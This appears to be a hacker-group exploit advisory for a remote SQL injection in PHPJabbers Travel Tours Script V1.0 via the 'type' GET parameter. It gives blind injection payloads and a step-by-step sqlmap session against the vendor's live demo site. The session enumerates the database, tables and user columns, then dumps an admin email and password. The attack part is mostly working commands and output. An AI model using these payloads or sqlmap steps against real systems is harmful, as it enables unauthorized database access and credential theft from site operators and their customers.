┌┌────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : phpjabbers.com │ │ │ │ Vendor : PHPJABBERS │ │ Travel Tours Script │ │ Software : Travel Tours Script V1.0 │ │ │ │ Vuln Type: Remote SQL Injection │ │ A content management solution for │ │ Method : GET │ │ travel agencies and tour operators │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : Database Access │ │ │ │ ─────────────────────────────────────┘ └────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ Live Demo Site: https://www.phpjabbers.com/travel-tours-script/#sectionDemo POC: https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection] GET parameter 'type' is vulnerable --- Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206 --- [+] Starting the Attack sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.0.12 [INFO] fetching current database current database: 'pjabbers_demo_vpl' sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast [INFO] fetching tables for database: 'pjabbers_demo_vpl' [INFO] fetching number of tables for database 'pjabbers_demo_vpl' [INFO] resumed: 52 +------------------------------------------+ | vacationpackages_comments | | vacationpackages_countries | | vacationpackages_enquiries | | vacationpackages_features | | vacationpackages_fields | | vacationpackages_listings_availabilities | | vacationpackages_listings_features | | vacationpackages_listings | | vacationpackages_multi_lang | | vacationpackages_notifications | | vacationpackages_options | | vacationpackages_payments | | vacationpackages_periods | | vacationpackages_plugin_country | | vacationpackages_plugin_galleries_set | | vacationpackages_plugin_gallery | | vacationpackages_plugin_locale_languages | | vacationpackages_plugin_locale | | vacationpackages_plugin_log_config | | vacationpackages_plugin_log | | vacationpackages_plugin_one_admin | | vacationpackages_plugin_paypal | | vacationpackages_prices | | vacationpackages_roles | | vacationpackages_types | | vacationpackages_users | | vacationpackages_comments | | vacationpackages_countries | | vacationpackages_enquiries | | vacationpackages_features | | vacationpackages_fields | | vacationpackages_listings | | vacationpackages_listings_availabilities | | vacationpackages_listings_features | | vacationpackages_multi_lang | | vacationpackages_notifications | | vacationpackages_options | | vacationpackages_payments | | vacationpackages_periods | | vacationpackages_plugin_country | | vacationpackages_plugin_galleries_set | | vacationpackages_plugin_gallery | | vacationpackages_plugin_locale | | vacationpackages_plugin_locale_languages | | vacationpackages_plugin_log | | vacationpackages_plugin_log_config | | vacationpackages_plugin_one_admin | | vacationpackages_plugin_paypal | | vacationpackages_prices | | vacationpackages_roles | | vacationpackages_types | | vacationpackages_users | +------------------------------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast [INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl' Database: pjabbers_demo_vpl Table: vacationpackages_users [16 columns] +----------------+--------------------------------------------------------+ | Column | Type | +----------------+--------------------------------------------------------+ | contact_fax | varchar(255) | | contact_mobile | varchar(255) | | contact_phone | varchar(255) | | contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') | | contact_url | varchar(255) | | created | datetime | | email | varchar(255) | | id | int(10) unsigned | | ip | varchar(15) | | is_active | enum('T','F') | | last_login | datetime | | name | varchar(255) | | password | blob | | phone | varchar(255) | | role_id | int(10) unsigned | | status | enum('T','F') | +----------------+--------------------------------------------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast [INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl' Database: pjabbers_demo_vpl Table: vacationpackages_users [1 entry] +-----------------+------------------------+ | email | password | +-----------------+------------------------+ |admin@admin.com | P@S13rd | +-----------------+------------------------+ [-] Done └─────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘